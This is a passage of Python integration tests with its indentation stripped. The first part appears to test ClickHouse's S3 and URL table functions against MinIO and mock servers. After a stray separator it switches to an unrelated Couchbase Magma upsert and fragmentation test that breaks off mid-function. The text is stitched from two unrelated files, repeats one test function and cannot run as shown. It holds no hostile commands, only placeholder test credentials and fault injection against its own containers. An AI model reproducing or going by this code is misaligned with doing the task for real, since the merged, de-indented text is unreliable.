instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night + nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mocks(started_cluster):
logging.info("Starting s3 mocks")
mocks = (
("mock_s3.py", "resolver", "8080"),
("unstable_server.py", "resolver", "8081"),
("echo.py", "resolver", "8082"),
)
for mock_filename, container, port in mocks:
container_id = started_cluster.get_container_id(container)
current_dir = os.path.dirname(__file__)
started_cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mocks", mock_filename), mock_filename)
started_cluster.exec_in_container(container_id, ["python", mock_filename, port], detach=True)
# Wait for S3 mocks to start
for mock_filename, container, port in mocks:
num_attempts = 100
for attempt in range(num_attempts):
ping_response = started_cluster.exec_in_container(started_cluster.get_container_id(container),
["curl", "-s", f"http://localhost:{port}/"], nothrow=True)
if ping_response != 'OK':
if attempt == num_attempts - 1:
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
else:
time.sleep(1)
else:
logging.debug(f"mock {mock_filename} ({port}) answered {ping_response} on attempt {attempt}")
break
logging.info("S3 mocks started")
def replace_config(old, new):
config = open(CONFIG_PATH, 'r')
config_lines = config.readlines()
config.close()
config_lines = [line.replace(old, new) for line in config_lines]
config = open(CONFIG_PATH, 'w')
config.writelines(config_lines)
config.close()
def test_custom_auth_headers(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
instance.query("DROP TABLE IF EXISTS test")
instance.query(
"CREATE TABLE test ({table_format}) ENGINE = S3('http://resolver:8080/{bucket}/{file}', 'CSV')".format(
bucket=started_cluster.minio_restricted_bucket,
file=filename,
table_format=table_format
))
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
replace_config("<header>Authorization: Bearer TOKEN", "<header>Authorization: Bearer INVALID_TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
ret, err = instance.query_and_get_answer_with_error("SELECT * FROM test")
assert ret == "" and err != ""
replace_config("<header>Authorization: Bearer INVALID_TOKEN", "<header>Authorization: Bearer TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
instance.query("DROP TABLE test")
def test_custom_auth_headers_exclusion(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"SELECT * FROM s3('http://resolver:8080/{started_cluster.minio_restricted_bucket}/restricteddirectory/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
with pytest.raises(helpers.client.QueryRuntimeException) as ei:
result = run_query(instance, get_query)
print(result)
assert ei.value.returncode == 243
assert 'Forbidden Error' in ei.value.stderr
def test_infinite_redirect(started_cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"select * from s3('http://resolver:{started_cluster.minio_redirect_port}/{bucket}/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz"),
])
def test_storage_s3_get_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_get_gzip.{extension}"
name = f"test_get_gzip_{extension}"
data = [
"Sophia Intrieri,55",
"Jack Taylor,71",
"Christopher Silva,66",
"Clifton Purser,35",
"Richard Aceuedo,43",
"Lisa Hensley,31",
"Alice Wehrley,1",
"Mary Farmer,47",
"Samara Ramirez,19",
"Shirley Lloyd,51",
"Santos Cowger,0",
"Richard Mundt,88",
"Jerry Gonzalez,15",
"Angela James,10",
"Norman Ortega,33",
""
]
run_query(instance, f"DROP TABLE IF EXISTS {name}")
buf = io.BytesIO()
compressed = gzip.GzipFile(fileobj=buf, mode="wb")
compressed.write(("\n".join(data)).encode())
compressed.close()
put_s3_file_content(started_cluster, bucket, filename, buf.getvalue())
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["565"]
run_query(instance, f"DROP TABLE {name}")
def test_storage_s3_get_unstable(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 Int64, column2 Int64, column3 Int64, column4 Int64"
get_query = f"SELECT count(), sum(column3), sum(column4) FROM s3('http://resolver:8081/{started_cluster.minio_bucket}/test.csv', 'CSV', '{table_format}') FORMAT CSV"
result = run_query(instance, get_query)
assert result.splitlines() == ["500001,500000,0"]
def test_storage_s3_put_uncompressed(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = "test_put_uncompressed.bin"
name = "test_put_uncompressed"
data = [
"'Gloria Thompson',99",
"'Matthew Tang',98",
"'Patsy Anderson',23",
"'Nancy Badillo',93",
"'Roy Hunt',5",
"'Adam Kirk',51",
"'Joshua Douds',28",
"'Jolene Ryan',0",
"'Roxanne Padilla',50",
"'Howard Roberts',41",
"'Ricardo Broughton',13",
"'Roland Speer',83",
"'Cathy Cohan',58",
"'Kathie Dawson',100",
"'Gregg Mcquistion',11",
]
run_query(instance, "CREATE TABLE {} (name String, id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename))
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["753"]
uncompressed_content = get_s3_file_content(started_cluster, bucket, filename)
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 753
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz")
])
def test_storage_s3_put_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_put_gzip.{extension}"
name = f"test_put_gzip_{extension}"
data = [
"'Joseph Tomlinson',5",
"'Earnest Essary',44",
"'Matha Pannell',24",
"'Michael Shavers',46",
"'Elias Groce',38",
"'Pamela Bramlet',50",
"'Lewis Harrell',49",
"'Tamara Fyall',58",
"'George Dixon',38",
"'Alice Walls',49",
"'Paula Mais',24",
"'Myrtle Pelt',93",
"'Sylvia Naffziger',18",
"'Amanda Cave',83",
"'Yolanda Joseph',89"
]
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"INSERT INTO {name} VALUES ({'),('.join(data)})")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["708"]
buf = io.BytesIO(get_s3_file_content(started_cluster, bucket, filename, decode=False))
f = gzip.GzipFile(fileobj=buf, mode="rb")
uncompressed_content = f.read().decode()
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 708
def test_truncate_table(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
name = "truncate"
instance.query("CREATE TABLE {} (id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, name))
instance.query("INSERT INTO {} SELECT number FROM numbers(10)".format(name))
result = instance.query("SELECT * FROM {}".format(name))
assert result == instance.query("SELECT number FROM numbers(10)")
instance.query("TRUNCATE TABLE {}".format(name))
minio = started_cluster.minio_client
timeout = 30
while timeout > 0:
if len(list(minio.list_objects(started_cluster.minio_bucket, 'truncate/'))) == 0:
return
timeout -= 1
time.sleep(1)
assert(len(list(minio.list_objects(started_cluster.minio_bucket, 'truncate/'))) == 0)
assert instance.query("SELECT * FROM {}".format(name)) == ""
def test_predefined_connection_configuration(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
name = "test_table"
instance.query("drop table if exists {}".format(name))
instance.query("CREATE TABLE {} (id UInt32) ENGINE = S3(s3_conf1, format='CSV')".format(name))
instance.query("INSERT INTO {} SELECT number FROM numbers(10)".format(name))
result = instance.query("SELECT * FROM {}".format(name))
assert result == instance.query("SELECT number FROM numbers(10)")
result = instance.query("SELECT * FROM s3(s3_conf1, format='CSV', structure='id UInt32')")
assert result == instance.query("SELECT number FROM numbers(10)")
result = ""
def test_url_reconnect_in_the_middle(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "id String, data String"
filename = "test_url_reconnect_{}.tsv".format(random.randint(0, 1000))
instance.query(f"""insert into table function
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'TSV', '{table_format}')
select number, randomPrintableASCII(number % 1000) from numbers(1000000)""")
with PartitionManager() as pm:
pm_rule_reject = {'probability': 0.02, 'destination': instance.ip_address, 'source_port': started_cluster.minio_port, 'action': 'REJECT --reject-with tcp-reset'}
pm_rule_drop_all = {'destination': instance.ip_address, 'source_port': started_cluster.minio_port, 'action': 'DROP'}
pm._add_rule(pm_rule_reject)
def select():
global result
result = instance.query(
f"""select sum(cityHash64(x)) from (select toUInt64(id) + sleep(0.1) as x from
url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'TSV', '{table_format}')
settings http_max_tries = 10, http_retry_max_backoff_ms=2000, http_send_timeout=1, http_receive_timeout=1)""")
assert(int(result) == 3914219105369203805)
thread = threading.Thread(target=select)
thread.start()
time.sleep(4)
pm._add_rule(pm_rule_drop_all)
time.sleep(2)
pm._delete_rule(pm_rule_drop_all)
pm._delete_rule(pm_rule_reject)
thread.join()
assert(int(result) == 3914219105369203805)
def test_seekable_formats(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"insert into table function {table_function} SELECT number, randomString(100) FROM numbers(5000000) settings s3_truncate_on_insert=1")
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
table_function = f"s3(s3_orc, structure='a Int32, b String', format='ORC')"
exec_query_with_retry(instance, f"insert into table function {table_function} SELECT number, randomString(100) FROM numbers(5000000) settings s3_truncate_on_insert=1")
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
instance.query("SYSTEM FLUSH LOGS")
result = instance.query(f"SELECT formatReadableSize(memory_usage) FROM system.query_log WHERE startsWith(query, 'SELECT count() FROM s3') AND memory_usage > 0 ORDER BY event_time desc")
print(result[:3])
assert(int(result[:3]) < 200)
def test_seekable_formats_url(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"insert into table function {table_function} select number, randomString(100) from numbers(5000000) settings s3_truncate_on_insert=1")
table_function = f"url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_parquet', 'Parquet', 'a Int32, b String')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
table_function = f"s3(s3_orc, structure='a Int32, b String', format='ORC')"
exec_query_with_retry(instance, f"insert into table function {table_function} select number, randomString(100) from numbers(5000000) settings s3_truncate_on_insert=1")
table_function = f"url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_orc', 'ORC', 'a Int32, b String')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
instance.query("SYSTEM FLUSH LOGS")
result = instance.query(f"SELECT formatReadableSize(memory_usage) FROM system.query_log WHERE startsWith(query, 'SELECT count() FROM url') AND memory_usage > 0 ORDER BY event_time desc")
print(result[:3])
assert(int(result[:3]) < 200)
def test_empty_file(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
name = "empty"
url = f'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{name}'
minio = started_cluster.minio_client
minio.put_object(bucket, name, io.BytesIO(b""), 0)
table_function = f"s3('{url}', 'CSV', 'id Int32')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 0)
def test_insert_with_path_with_globs(started_cluster):
instance = started_cluster.instances["dummy"]
table_function_3 = f"s3('http://minio1:9001/root/test_parquet*', 'minio', 'minio123', 'Parquet', 'a Int32, b String')"
instance.query_and_get_error(f"insert into table function {table_function_3} SELECT number, randomString(100) FROM numbers(500)")
def test_s3_schema_inference(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
instance.query(f"insert into table function s3(s3_native, structure='a Int32, b String', format='Native') select number, randomString(100) from numbers(5000000)")
result = instance.query(f"desc s3(s3_native, format='Native')")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from s3(s3_native, format='Native')")
assert(int(result) == 5000000)
instance.query(f"create table schema_inference engine=S3(s3_native, format='Native')")
result = instance.query(f"desc schema_inference")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from schema_inference")
assert(int(result) == 5000000)
table_function = f"url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_native', 'Native')"
result = instance.query(f"desc {table_function}")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from {table_function}")
assert(int(result) == 5000000)
instance.query(f"create table schema_inference_2 engine=URL('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_native', 'Native')")
result = instance.query(f"desc schema_inference_2")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from schema_inference_2")
assert(int(result) == 5000000)
table_function = f"s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_native', 'Native')"
result = instance.query(f"desc {table_function}")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from {table_function}")
assert(int(result) == 5000000)
def test_empty_file(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
name = "empty"
url = f'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{name}'
minio = started_cluster.minio_client
minio.put_object(bucket, name, io.BytesIO(b""), 0)
table_function = f"s3('{url}', 'CSV', 'id Int32')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 0)
def test_overwrite(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"create table test_overwrite as {table_function}")
instance.query(f"truncate table test_overwrite")
instance.query(f"insert into test_overwrite select number, randomString(100) from numbers(50) settings s3_truncate_on_insert=1")
instance.query_and_get_error(f"insert into test_overwrite select number, randomString(100) from numbers(100)")
instance.query(f"insert into test_overwrite select number, randomString(100) from numbers(200) settings s3_truncate_on_insert=1")
result = instance.query(f"select count() from test_overwrite")
assert(int(result) == 200)
def test_create_new_files_on_insert(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"create table test_multiple_inserts as {table_function}")
instance.query(f"truncate table test_multiple_inserts")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(10) settings s3_truncate_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(20) settings s3_create_new_file_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(30) settings s3_create_new_file_on_insert=1")
result = instance.query(f"select count() from test_multiple_inserts")
assert(int(result) == 60)
instance.query(f"drop table test_multiple_inserts")
table_function = f"s3(s3_parquet_gz, structure='a Int32, b String', format='Parquet')"
instance.query(f"create table test_multiple_inserts as {table_function}")
instance.query(f"truncate table test_multiple_inserts")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(10) settings s3_truncate_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(20) settings s3_create_new_file_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(30) settings s3_create_new_file_on_insert=1")
result = instance.query(f"select count() from test_multiple_inserts")
assert(int(result) == 60)
def test_format_detection(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
instance.query(f"create table arrow_table_s3 (x UInt64) engine=S3(s3_arrow)")
instance.query(f"insert into arrow_table_s3 select 1")
result = instance.query(f"select * from s3(s3_arrow)")
assert(int(result) == 1)
result = instance.query(f"select * from url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow')")
assert(int(result) == 1)
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow')")
assert(int(result) == 1)
instance.query(f"create table parquet_table_s3 (x UInt64) engine=S3(s3_parquet2)")
instance.query(f"insert into parquet_table_s3 select 1")
result = instance.query(f"select * from s3(s3_parquet2)")
assert(int(result) == 1)
result = instance.query(f"select * from url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.parquet')")
assert(int(result) == 1)
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.parquet')")
assert(int(result) == 1)
def test_schema_inference_from_globs(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
instance.query(f"insert into table function s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test1.jsoncompacteachrow', 'JSONCompactEachRow', 'x Nullable(UInt32)') select NULL")
instance.query(f"insert into table function s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test2.jsoncompacteachrow', 'JSONCompactEachRow', 'x Nullable(UInt32)') select 0")
url_filename = "test{1,2}.jsoncompacteachrow"
result = instance.query(f"desc url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{url_filename}')")
assert(result.strip() == 'c1\tNullable(Float64)')
result = instance.query(f"select * from url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{url_filename}')")
assert(sorted(result.split()) == ['0', '\\N'])
result = instance.query(f"desc s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test*.jsoncompacteachrow')")
assert(result.strip() == 'c1\tNullable(Float64)')
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test*.jsoncompacteachrow')")
assert(sorted(result.split()) == ['0', '\\N'])
def test_signatures(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
instance.query(f"create table test_signatures (x UInt64) engine=S3(s3_arrow)")
instance.query(f"truncate table test_signatures")
instance.query(f"insert into test_signatures select 1")
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow')")
assert(int(result) == 1)
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow', 'Arrow', 'x UInt64')")
assert(int(result) == 1)
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow', 'minio', 'minio123')")
assert(int(result) == 1)
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow', 'Arrow', 'x UInt64', 'auto')")
assert(int(result) == 1)
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow', 'minio', 'minio123', 'Arrow')")
assert(int(result) == 1)
|
magma_upserts.py
|
import copy
import threading
import time
from Cb_constants.CBServer import CbServer
import json as Json
from magma_basic_crud import BasicCrudTests
from remote.remote_util import RemoteMachineShellConnection
from sdk_client3 import SDKClient
class BasicUpsertTests(BasicCrudTests):
def test_update_n_times_new(self):
"""
Test Focus: Update items n times and
test space amplification
STEPS:
-- Update items n times (where n gets calculated
from fragmentation value
-- Check space amplification
-- Repeat the above steps n times
-- After all iterations validate the data
Note: This test is written using new doc loader
and is targeted for 1% DGM
"""
self.log.info("test_update_n_times_new starts")
self.create_start = 0
self.create_end = self.init_items_per_collection
self.mutate = 0
self.log.info("Initial loading with new loader starts")
self.new_loader(wait=True)
self.sleep(60, "sleep after init loading in test")
disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)
self.disk_usage[self.buckets[0].name] = disk_usage[0]
self.log.info(
"For bucket {} disk usage after initial creation is {}MB\
".format(self.buckets[0].name,
self.disk_usage[self.buckets[0].name]))
count = 0
while count < self.test_itr:
self.log.info("Iteration == {}".format(count+1))
#################################################################
'''
STEP - 1, Update Items
'''
self.doc_ops = "update"
self.update_start = 0
self.update_end = self.init_items_per_collection
self.create_perc = 0
self.read_perc = 0
self.delete_perc = 0
self.expiry_perc = 0
self.update_perc = 100
self.mutate += 1
self.new_loader(wait=True)
self.log.info("Waiting for ep-queues to get drained")
self.bucket_util._wait_for_stats_all_buckets(
self.cluster, self.cluster.buckets, timeout=3600)
#################################################################
'''
STEP - 2, Space Amplification Check
'''
msg = "Fragmentation value for {} stats exceeds\
the configured value"
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg.format("KV"))
time_end = time.time() + 60 * 10
while time.time() < time_end:
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.debug("usage at time {} is {}".format((time_end - time.time()), _res))
if _res < 2.5 * self.disk_usage[self.disk_usage.keys()[0]]:
break
msg = "Iteration= {}, Disk Usage = {}MB\
exceeds {} times from Actual disk usage = {}MB"
self.assertIs(_res > 2.5 * self.disk_usage[
self.disk_usage.keys()[0]],
False, msg.format(count+1, _res, 2.5,
self.disk_usage[self.disk_usage.keys()[0]]))
count += 1
#######################################################################
'''
STEP - 3, Data Validation
'''
self.data_validation()
#########################################
def test_update_n_times(self):
"""
Test Focus: Update items n times and
test space amplification
STEPS:
-- Update items n times (where n gets calculated
from fragmentation value
-- Check space amplification
-- Repeat the above steps n times
-- After all iterations validate the data
"""
self.log.info("test_update_n_times starts")
upsert_doc_list = self.get_fragmentation_upsert_docs_list()
self.mutate = 0
count = 0
while count < self.test_itr:
self.log.info("Iteration == {}".format(count+1))
#################################################################
'''
STEP - 1, Update Items
'''
for itr in upsert_doc_list:
self.doc_ops = "update"
self.update_start = 0
self.update_end = itr
if self.rev_update:
self.update_start = -int(itr - 1)
self.update_end = 1
self.generate_docs(doc_ops="update")
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.log.info("Waiting for ep-queues to get drained")
self.bucket_util._wait_for_stats_all_buckets(
self.cluster, self.cluster.buckets, timeout=3600)
#################################################################
'''
STEP - 2, Space Amplification Check
'''
msg = "Fragmentation value for {} stats exceeds\
the configured value"
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg.format("KV"))
usage_factor = ((float(
self.num_items + sum(upsert_doc_list)
) / self.num_items) + 0.5)
self.log.debug("Disk usage factor = {}".format(usage_factor))
time_end = time.time() + 60 * 10
while time.time() < time_end:
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.debug("usage at time {} is {}".format((time_end - time.time()), _res))
if _res < usage_factor * self.disk_usage[self.disk_usage.keys()[0]]:
break
msg = "Iteration= {}, Disk Usage = {}MB\
exceeds {} times from Actual disk usage = {}MB"
self.assertIs(_res > usage_factor * self.disk_usage[
self.disk_usage.keys()[0]],
False, msg.format(count+1, _res, usage_factor,
self.disk_usage[self.disk_usage.keys()[0]]))
count += 1
#######################################################################
'''
STEP - 3, Data Validation
'''
self.validate_data("update", self.gen_update)
if not self.windows_platform:
self.change_swap_space(self.cluster.nodes_in_cluster,
disable=False)
self.log.info("====test_update_n_times ends====")
def test_multi_update_delete(self):
"""
STEPS:
-- Update items x times
-- Check space amplification
-- Delete half of the items
-- Check space Amplification
-- Recreate deleted items
-- Check Space Amplification
-- Repeat above steps for n times
-- After all iterations validate the data
"""
self.log.info("==== test_multi_update_delete starts =====")
count = 0
msg_stats = "Fragmentation value for {} stats exceeds\
the configured value"
msg = "{} Iteration= {}, Disk Usage = {}MB\
exceeds 2.5 times from Actual disk usage = {}MB"
self.mutate = 0
for i in range(self.test_itr):
self.log.info("Step 1, Iteration= {}".format(i+1))
#######################################################################
'''
STEP - 1, Update Items, update_itr times
'''
while count < self.update_itr:
self.doc_ops = "update"
self.update_start = 0
self.update_end = self.num_items
if self.rev_update:
self.update_start = -int(self.num_items - 1)
self.update_end = 1
self.log.info("Iteration {} , Upsert Iteration {}".
format(self.test_itr, count+1))
self.generate_docs(doc_ops="update")
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.log.info("Waiting for ep-queues to get drained")
self.bucket_util._wait_for_stats_all_buckets(
self.cluster, self.cluster.buckets, timeout=3600)
###################################################################
'''
STEP - 2
-- Space Amplification check after each update iteration.
-- Data validation only for last update iteration
'''
self.log.info("Step 2, Iteration= {}".format(i+1))
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
time_end = time.time() + 60 * 10
while time.time() < time_end:
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("Update Iteration-{}, Disk Usage at time {} is {}MB \
".format(count+1, time_end - time.time(), _res))
if _res < 2.5 * self.disk_usage[self.disk_usage.keys()[0]]:
break
self.assertIs(
_res > 2.5 * self.disk_usage[self.disk_usage.keys()[0]],
False, msg.format("update", count+1, _res,
self.disk_usage[self.disk_usage.keys()[0]]))
count += 1
self.update_itr += self.update_itr
if i+1 == self.test_itr:
self.validate_data("update", self.gen_update)
###################################################################
'''
STEP - 3
-- Delete half of the docs.
'''
self.log.info("Step 3, Iteration {}".format(i+1))
self.doc_ops = "delete"
self.delete_start = 0
self.delete_end = self.num_items//2
if self.rev_del:
self.delete_start = -int(self.num_items//2 - 1)
self.delete_end = 1
self.generate_docs(doc_ops="delete")
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.num_items)
###################################################################
'''
STEP - 4
-- Space Amplification Check after deletion.
'''
self.sleep(60, "sleep before checking fragmentation")
self.log.info("Step 4, Iteration {}".format(i+1))
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
time_end = time.time() + 60 * 10
while time.time() < time_end:
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("Delete Iteration-{}, Disk Usage at time {} is {}MB \
".format(i+1, time_end - time.time(), _res))
if _res < 2.5 * self.disk_usage[self.disk_usage.keys()[0]]:
break
self.assertIs(
_res > 2.5 * self.disk_usage[
self.disk_usage.keys()[0]],
False, msg.format(
"delete", i+1, _res,
self.disk_usage[self.disk_usage.keys()[0]]))
self.bucket_util._run_compaction(self.cluster, number_of_times=1)
ts = self.get_tombstone_count_key(self.cluster.nodes_in_cluster)
expected_ts_count = (self.items // 2)*(self.num_replicas+1)*(count+1)
self.log.info("Iterations - {}, Actual tombstones == {} expected_ts_count == {}".format(i+1, ts, expected_ts_count))
